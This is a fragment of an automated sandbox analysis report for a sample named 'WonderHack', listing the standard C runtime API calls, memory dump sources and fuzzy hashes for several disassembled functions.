                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50271fc9c27b77633ee039633b90e4aca2c9a73d053798de6565b381c0ade01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11D2F5A012557FA71237BA9C8DDEF2ADCEE843A9F500124F846D2151FA24DF0192B6
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CA43A0
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00CA43AA
                                                                                                                                                                                                                                                                            • Part of subcall function 00C94D90: std::_Lockit::_Lockit.LIBCPMT ref: 00C94DBE
                                                                                                                                                                                                                                                                            • Part of subcall function 00C94D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00C94DE9
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 00CA43E4
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00CA441B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                          • Opcode ID: f6a379e71117806fb4d3a527d5420214101fbd5f0c73c85a224ac740a36c27f9
                                                                                                                                                                                                                                                                          • Instruction ID: f86c7fcb18d4493f9a778e2045c287080afe2e820abc1ad766d9b40c5b15c21d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6a379e71117806fb4d3a527d5420214101fbd5f0c73c85a224ac740a36c27f9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F01967590112A9BCF09EB64D905BBDB771AF85319F294519F410A7291CF709E01E790
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000), ref: 00CC21F7
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000,?,?,?,00CBAE0F,?), ref: 00CC2203
                                                                                                                                                                                                                                                                            • Part of subcall function 00CC2254: CloseHandle.KERNEL32(FFFFFFFE,00CC2213,?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000,?,?), ref: 00CC2264
                                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 00CC2213
                                                                                                                                                                                                                                                                            • Part of subcall function 00CC2235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CC21D1,00CC16BC,?,?,00CBB4C9,?,00000000,00000000,?), ref: 00CC2248
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000,?), ref: 00CC2228
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                          • Opcode ID: cd0fd5e88a7d51c19a32a91ead1180a647d04bb50d8f346b20e905b950ec2373
                                                                                                                                                                                                                                                                          • Instruction ID: dbd1b987e27596b66e975ab0461cb77d0ddc62894e8d74a24f4a276026f588bb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd0fd5e88a7d51c19a32a91ead1180a647d04bb50d8f346b20e905b950ec2373
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AF0AC36511115BBCF262FD5DC08F9E7F66FB493B1B054125FE1995120DB728920AB90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CAD04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CB7BA2
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CAD04D,?,?,?,00000055,?,-00000050,?,?), ref: 00CB7BD9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                                                          • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                          • Opcode ID: 3d664294a0b12362cefb849289553384bfd306dbd5dfeba46acbedefe3b9e28a
                                                                                                                                                                                                                                                                          • Instruction ID: 7235ab547f55b26cb7cfff21ae6810aaf4d7be8c44baf592d6404ec88a201ae1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d664294a0b12362cefb849289553384bfd306dbd5dfeba46acbedefe3b9e28a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32510531608315ABDB25AB74CC42FEA77A8EFC4700F10066DFD259B181FA70EA40DBA5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CB2B4B,?,?,00000000,00000000,00000000,?), ref: 00CB2C6F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 8da995c2297eef3582e997dc565ef46bb3e8f9b5d48b52ebc39423080c88fd66
                                                                                                                                                                                                                                                                          • Instruction ID: e5669d1c34dc4327cb8b316301bb0be1ae35ee52ccb07143ce4e5bef3f6b82cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da995c2297eef3582e997dc565ef46bb3e8f9b5d48b52ebc39423080c88fd66
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32416972900209AFDF26DFA8CD81AEEBBB5FF48304F188199F914A7221D3359A50DB51
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00CB272D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                          • Opcode ID: 77a5cfb530ea8ae895fd61f6bf0a53aa88d10fb72eb5e9eb1e27165186a66308
                                                                                                                                                                                                                                                                          • Instruction ID: c9ee65b74c312f3727477516dc28cc0989aebadad4745b2e82db0aa91d55bc03
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a5cfb530ea8ae895fd61f6bf0a53aa88d10fb72eb5e9eb1e27165186a66308
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A531D136400219ABCF268F50CC459EABB66FF18715F18855AFC64591A1C733CEA2EBD1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00CA3114
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?), ref: 00CA3139
                                                                                                                                                                                                                                                                            • Part of subcall function 00CA7223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00CA5F93,?,?,?,?,00CA5F93,00001000,00CCE1AC,00001000), ref: 00CA7284
                                                                                                                                                                                                                                                                            • Part of subcall function 00CAF7B9: IsProcessorFeaturePresent.KERNEL32(00000017,00CAA37B,?,?,?,?,00000000), ref: 00CAF7D5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: a5a86c83e9159545bc9a9a7e418fe1a727e505b01e9c7b3a5e8076a42f5723bf
                                                                                                                                                                                                                                                                          • Instruction ID: 9b947fa6b3b4bdc0ac7e474d9eadb82ae301866efa5b10e53aa66e416f68eff5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a86c83e9159545bc9a9a7e418fe1a727e505b01e9c7b3a5e8076a42f5723bf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C721BB32D00219ABCF24DFE9DD55AAEB7B9EF06718F140419F526AB250CB30AF45CB91